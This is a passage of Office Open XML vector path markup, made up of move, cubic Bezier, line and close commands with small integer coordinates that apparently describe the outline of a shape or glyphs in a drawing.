                  <a:pt x="116" y="55"/>
                  <a:pt x="116" y="55"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="116" y="55"/>
                  <a:pt x="116" y="55"/>
                  <a:pt x="116" y="55"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="116" y="55"/>
                  <a:pt x="116" y="55"/>
                  <a:pt x="116" y="54"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="116" y="54"/>
                  <a:pt x="116" y="54"/>
                  <a:pt x="116" y="54"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="117" y="52"/>
                  <a:pt x="117" y="52"/>
                  <a:pt x="117" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="116" y="52"/>
                  <a:pt x="116" y="52"/>
                  <a:pt x="116" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="114" y="54"/>
                  <a:pt x="114" y="54"/>
                  <a:pt x="114" y="54"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="114" y="54"/>
                  <a:pt x="114" y="54"/>
                  <a:pt x="114" y="54"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="55"/>
                  <a:pt x="115" y="55"/>
                  <a:pt x="115" y="55"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="115" y="54"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="116" y="53"/>
                  <a:pt x="116" y="53"/>
                  <a:pt x="116" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="54"/>
                  <a:pt x="115" y="54"/>
                  <a:pt x="115" y="54"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="118" y="56"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="118" y="56"/>
                  <a:pt x="118" y="56"/>
                  <a:pt x="118" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="118" y="56"/>
                  <a:pt x="118" y="56"/>
                  <a:pt x="118" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="118" y="56"/>
                  <a:pt x="118" y="56"/>
                  <a:pt x="118" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="118" y="56"/>
                  <a:pt x="118" y="56"/>
                  <a:pt x="118" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="118" y="56"/>
                  <a:pt x="118" y="56"/>
                  <a:pt x="118" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119" y="57"/>
                  <a:pt x="119" y="57"/>
                  <a:pt x="119" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119" y="57"/>
                  <a:pt x="119" y="57"/>
                  <a:pt x="119" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119" y="57"/>
                  <a:pt x="119" y="56"/>
                  <a:pt x="119" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119" y="56"/>
                  <a:pt x="119" y="56"/>
                  <a:pt x="119" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119" y="56"/>
                  <a:pt x="119" y="56"/>
                  <a:pt x="119" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119" y="56"/>
                  <a:pt x="119" y="56"/>
                  <a:pt x="119" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119" y="56"/>
                  <a:pt x="119" y="56"/>
                  <a:pt x="119" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119" y="56"/>
                  <a:pt x="119" y="56"/>
                  <a:pt x="119" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119" y="56"/>
                  <a:pt x="119" y="55"/>
                  <a:pt x="119" y="55"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119" y="55"/>
                  <a:pt x="119" y="55"/>
                  <a:pt x="119" y="55"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="120" y="53"/>
                  <a:pt x="120" y="53"/>
                  <a:pt x="120" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119" y="53"/>
                  <a:pt x="119" y="53"/>
                  <a:pt x="119" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="117" y="55"/>
                  <a:pt x="117" y="55"/>
                  <a:pt x="117" y="55"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="117" y="55"/>
                  <a:pt x="117" y="55"/>
                  <a:pt x="117" y="55"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119" y="56"/>
                  <a:pt x="119" y="56"/>
                  <a:pt x="119" y="56"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="118" y="56"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="118" y="55"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="119" y="54"/>
                  <a:pt x="119" y="54"/>
                  <a:pt x="119" y="54"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119" y="55"/>
                  <a:pt x="119" y="55"/>
                  <a:pt x="119" y="55"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="118" y="55"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="122" y="57"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="121" y="57"/>
                  <a:pt x="121" y="57"/>
                  <a:pt x="121" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="121" y="57"/>
                  <a:pt x="121" y="57"/>
                  <a:pt x="121" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="121" y="57"/>
                  <a:pt x="121" y="57"/>
                  <a:pt x="121" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="121" y="57"/>
                  <a:pt x="121" y="57"/>
                  <a:pt x="121" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="121" y="57"/>
                  <a:pt x="121" y="57"/>
                  <a:pt x="121" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="122" y="58"/>
                  <a:pt x="122" y="58"/>
                  <a:pt x="122" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="122" y="58"/>
                  <a:pt x="122" y="58"/>
                  <a:pt x="122" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="122" y="57"/>
                  <a:pt x="122" y="57"/>
                  <a:pt x="122" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="122" y="57"/>
                  <a:pt x="122" y="57"/>
                  <a:pt x="122" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="122" y="57"/>
                  <a:pt x="122" y="57"/>
                  <a:pt x="122" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="122" y="57"/>
                  <a:pt x="122" y="57"/>
                  <a:pt x="122" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="122" y="57"/>
                  <a:pt x="122" y="57"/>
                  <a:pt x="123" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="123" y="57"/>
                  <a:pt x="123" y="57"/>
                  <a:pt x="123" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="123" y="57"/>
                  <a:pt x="123" y="56"/>
                  <a:pt x="123" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="123" y="56"/>
                  <a:pt x="123" y="56"/>
                  <a:pt x="122" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="123" y="54"/>
                  <a:pt x="123" y="54"/>
                  <a:pt x="123" y="54"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="122" y="54"/>
                  <a:pt x="122" y="54"/>
                  <a:pt x="122" y="54"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="120" y="56"/>
                  <a:pt x="120" y="56"/>
                  <a:pt x="120" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="120" y="56"/>
                  <a:pt x="120" y="56"/>
                  <a:pt x="120" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="122" y="57"/>
                  <a:pt x="122" y="57"/>
                  <a:pt x="122" y="57"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="121" y="56"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="122" y="55"/>
                  <a:pt x="122" y="55"/>
                  <a:pt x="122" y="55"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="122" y="56"/>
                  <a:pt x="122" y="56"/>
                  <a:pt x="122" y="56"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="121" y="56"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="125" y="58"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="125" y="58"/>
                  <a:pt x="125" y="58"/>
                  <a:pt x="125" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="125" y="58"/>
                  <a:pt x="124" y="58"/>
                  <a:pt x="124" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="124" y="58"/>
                  <a:pt x="124" y="58"/>
                  <a:pt x="124" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="124" y="58"/>
                  <a:pt x="124" y="58"/>
                  <a:pt x="124" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="124" y="58"/>
                  <a:pt x="124" y="58"/>
                  <a:pt x="124" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="125" y="58"/>
                  <a:pt x="125" y="58"/>
                  <a:pt x="125" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="125" y="59"/>
                  <a:pt x="125" y="59"/>
                  <a:pt x="125" y="59"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="126" y="58"/>
                  <a:pt x="126" y="58"/>
                  <a:pt x="126" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="126" y="58"/>
                  <a:pt x="126" y="58"/>
                  <a:pt x="126" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="126" y="58"/>
                  <a:pt x="125" y="58"/>
                  <a:pt x="125" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="125" y="58"/>
                  <a:pt x="125" y="58"/>
                  <a:pt x="125" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="126" y="58"/>
                  <a:pt x="126" y="58"/>
                  <a:pt x="126" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="126" y="58"/>
                  <a:pt x="126" y="58"/>
                  <a:pt x="126" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="126" y="58"/>
                  <a:pt x="126" y="57"/>
                  <a:pt x="126" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="126" y="57"/>
                  <a:pt x="126" y="57"/>
                  <a:pt x="126" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="126" y="55"/>
                  <a:pt x="126" y="55"/>
                  <a:pt x="126" y="55"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="126" y="55"/>
                  <a:pt x="126" y="55"/>
                  <a:pt x="126" y="55"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="124" y="57"/>
                  <a:pt x="124" y="57"/>
                  <a:pt x="124" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="123" y="57"/>
                  <a:pt x="123" y="57"/>
                  <a:pt x="123" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="125" y="58"/>
                  <a:pt x="125" y="58"/>
                  <a:pt x="125" y="58"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="124" y="57"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="125" y="56"/>
                  <a:pt x="125" y="56"/>
                  <a:pt x="125" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="125" y="57"/>
                  <a:pt x="125" y="57"/>
                  <a:pt x="125" y="57"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="124" y="57"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="64" y="85"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="90" y="85"/>
                  <a:pt x="90" y="85"/>
                  <a:pt x="90" y="85"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="90" y="96"/>
                  <a:pt x="90" y="96"/>
                  <a:pt x="90" y="96"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="64" y="96"/>
                  <a:pt x="64" y="96"/>
                  <a:pt x="64" y="96"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="64" y="85"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14" y="73"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="11" y="71"/>
                  <a:pt x="11" y="71"/>
                  <a:pt x="11" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14" y="69"/>
                  <a:pt x="14" y="69"/>
                  <a:pt x="14" y="69"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14" y="73"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="19" y="70"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="70"/>
                  <a:pt x="19" y="70"/>
                  <a:pt x="19" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="69"/>
                  <a:pt x="19" y="69"/>
                  <a:pt x="19" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="69"/>
                  <a:pt x="19" y="69"/>
                  <a:pt x="19" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20" y="69"/>
                  <a:pt x="20" y="69"/>
                  <a:pt x="20" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20" y="72"/>
                  <a:pt x="20" y="72"/>
                  <a:pt x="20" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21" y="72"/>
                  <a:pt x="21" y="72"/>
                  <a:pt x="21" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21" y="72"/>
                  <a:pt x="21" y="72"/>
                  <a:pt x="21" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21" y="72"/>
                  <a:pt x="21" y="73"/>
                  <a:pt x="21" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21" y="73"/>
                  <a:pt x="21" y="73"/>
                  <a:pt x="21" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21" y="73"/>
                  <a:pt x="21" y="73"/>
                  <a:pt x="21" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="73"/>
                  <a:pt x="19" y="73"/>
                  <a:pt x="19" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="73"/>
                  <a:pt x="19" y="73"/>
                  <a:pt x="19" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="73"/>
                  <a:pt x="19" y="73"/>
                  <a:pt x="19" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="73"/>
                  <a:pt x="19" y="72"/>
                  <a:pt x="19" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="72"/>
                  <a:pt x="19" y="72"/>
                  <a:pt x="19" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20" y="72"/>
                  <a:pt x="20" y="72"/>
                  <a:pt x="20" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20" y="70"/>
                  <a:pt x="20" y="70"/>
                  <a:pt x="20" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="70"/>
                  <a:pt x="19" y="70"/>
                  <a:pt x="19" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="70"/>
                  <a:pt x="19" y="70"/>
                  <a:pt x="19" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="70"/>
                  <a:pt x="19" y="70"/>
                  <a:pt x="19" y="70"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="24" y="72"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="24" y="72"/>
                  <a:pt x="24" y="72"/>
                  <a:pt x="24" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24" y="72"/>
                  <a:pt x="25" y="71"/>
                  <a:pt x="25" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25" y="72"/>
                  <a:pt x="24" y="72"/>
                  <a:pt x="24" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24" y="72"/>
                  <a:pt x="24" y="72"/>
                  <a:pt x="23" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="72"/>
                  <a:pt x="23" y="72"/>
                  <a:pt x="23" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="72"/>
                  <a:pt x="23" y="72"/>
                  <a:pt x="23" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="72"/>
                  <a:pt x="23" y="72"/>
                  <a:pt x="23" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="72"/>
                  <a:pt x="23" y="73"/>
                  <a:pt x="23" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="73"/>
                  <a:pt x="23" y="73"/>
                  <a:pt x="23" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="73"/>
                  <a:pt x="23" y="73"/>
                  <a:pt x="23" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24" y="73"/>
                  <a:pt x="24" y="73"/>
                  <a:pt x="25" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25" y="72"/>
                  <a:pt x="25" y="72"/>
                  <a:pt x="25" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25" y="71"/>
                  <a:pt x="25" y="70"/>
                  <a:pt x="25" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25" y="70"/>
                  <a:pt x="25" y="69"/>
                  <a:pt x="25" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24" y="69"/>
                  <a:pt x="24" y="69"/>
                  <a:pt x="24" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="69"/>
                  <a:pt x="23" y="69"/>
                  <a:pt x="23" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="70"/>
                  <a:pt x="23" y="70"/>
                  <a:pt x="23" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="71"/>
                  <a:pt x="23" y="71"/>
                  <a:pt x="23" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="72"/>
                  <a:pt x="23" y="72"/>
                  <a:pt x="24" y="72"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="23" y="70"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="24" y="70"/>
                  <a:pt x="24" y="69"/>
                  <a:pt x="24" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24" y="69"/>
                  <a:pt x="24" y="70"/>
                  <a:pt x="24" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24" y="70"/>
                  <a:pt x="25" y="70"/>
                  <a:pt x="25" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24" y="71"/>
                  <a:pt x="24" y="71"/>
                  <a:pt x="24" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24" y="71"/>
                  <a:pt x="24" y="71"/>
                  <a:pt x="23" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="71"/>
                  <a:pt x="23" y="70"/>
                  <a:pt x="23" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="70"/>
                  <a:pt x="23" y="70"/>
                  <a:pt x="23" y="70"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="26" y="72"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="26" y="72"/>
                  <a:pt x="26" y="72"/>
                  <a:pt x="26" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="26" y="73"/>
                  <a:pt x="27" y="73"/>
                  <a:pt x="27" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="27" y="73"/>
                  <a:pt x="27" y="73"/>
                  <a:pt x="28" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="73"/>
                  <a:pt x="28" y="73"/>
                  <a:pt x="28" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="29" y="73"/>
                  <a:pt x="29" y="73"/>
                  <a:pt x="29" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="29" y="72"/>
                  <a:pt x="29" y="72"/>
                  <a:pt x="29" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="29" y="72"/>
                  <a:pt x="29" y="72"/>
                  <a:pt x="29" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="29" y="71"/>
                  <a:pt x="29" y="71"/>
                  <a:pt x="29" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="29" y="71"/>
                  <a:pt x="29" y="71"/>
                  <a:pt x="29" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="29" y="70"/>
                  <a:pt x="29" y="70"/>
                  <a:pt x="29" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="29" y="70"/>
                  <a:pt x="29" y="69"/>
                  <a:pt x="29" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="69"/>
                  <a:pt x="28" y="69"/>
                  <a:pt x="28" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="27" y="69"/>
                  <a:pt x="27" y="69"/>
                  <a:pt x="27" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="26" y="69"/>
                  <a:pt x="26" y="70"/>
                  <a:pt x="26" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="26" y="70"/>
                  <a:pt x="26" y="70"/>
                  <a:pt x="26" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="26" y="71"/>
                  <a:pt x="27" y="71"/>
                  <a:pt x="27" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="27" y="71"/>
                  <a:pt x="26" y="71"/>
                  <a:pt x="26" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="26" y="72"/>
                  <a:pt x="26" y="72"/>
                  <a:pt x="26" y="72"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="27" y="70"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="27" y="70"/>
                  <a:pt x="27" y="69"/>
                  <a:pt x="28" y="69"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="69"/>
                  <a:pt x="28" y="70"/>
                  <a:pt x="28" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="70"/>
                  <a:pt x="28" y="70"/>
                  <a:pt x="28" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="70"/>
                  <a:pt x="28" y="70"/>
                  <a:pt x="28" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="71"/>
                  <a:pt x="28" y="71"/>
                  <a:pt x="28" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="27" y="71"/>
                  <a:pt x="27" y="71"/>
                  <a:pt x="27" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="27" y="70"/>
                  <a:pt x="27" y="70"/>
                  <a:pt x="27" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="27" y="70"/>
                  <a:pt x="27" y="70"/>
                  <a:pt x="27" y="70"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="27" y="71"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="27" y="71"/>
                  <a:pt x="27" y="71"/>
                  <a:pt x="28" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="71"/>
                  <a:pt x="28" y="71"/>
                  <a:pt x="28" y="71"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="72"/>
                  <a:pt x="28" y="72"/>
                  <a:pt x="28" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="72"/>
                  <a:pt x="28" y="72"/>
                  <a:pt x="28" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="72"/>
                  <a:pt x="28" y="72"/>
                  <a:pt x="28" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="27" y="72"/>
                  <a:pt x="27" y="72"/>
                  <a:pt x="27" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="27" y="72"/>
                  <a:pt x="27" y="72"/>
                  <a:pt x="27" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="27" y="72"/>
                  <a:pt x="27" y="72"/>
                  <a:pt x="27" y="71"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="32" y="72"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="32" y="72"/>
                  <a:pt x="32" y="72"/>
                  <a:pt x="32" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="31" y="72"/>
                  <a:pt x="31" y="72"/>
                  <a:pt x="31" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="31" y="72"/>
                  <a:pt x="31" y="73"/>
                  <a:pt x="31" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="31" y="73"/>
                  <a:pt x="31" y="73"/>
                  <a:pt x="31" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="31" y="73"/>
                  <a:pt x="31" y="73"/>
                  <a:pt x="32" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="32" y="73"/>
                  <a:pt x="32" y="73"/>
                  <a:pt x="32" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="33" y="73"/>
                  <a:pt x="33" y="73"/>
                  <a:pt x="33" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="33" y="73"/>
                  <a:pt x="33" y="73"/>
                  <a:pt x="33" y="73"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="33" y="73"/>
                  <a:pt x="33" y="72"/>
                  <a:pt x="33" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="33" y="72"/>
                  <a:pt x="33" y="72"/>
                  <a:pt x="32" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="32" y="72"/>
                  <a:pt x="32" y="72"/>
                  <a:pt x="32" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="33" y="72"/>
                  <a:pt x="33" y="72"/>
                  <a:pt x="33" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="33" y="72"/>
                  <a:pt x="33" y="72"/>
                  <a:pt x="33" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="33" y="72"/>
                  <a:pt x="33" y="72"/>
                  <a:pt x="33" y="72"/>
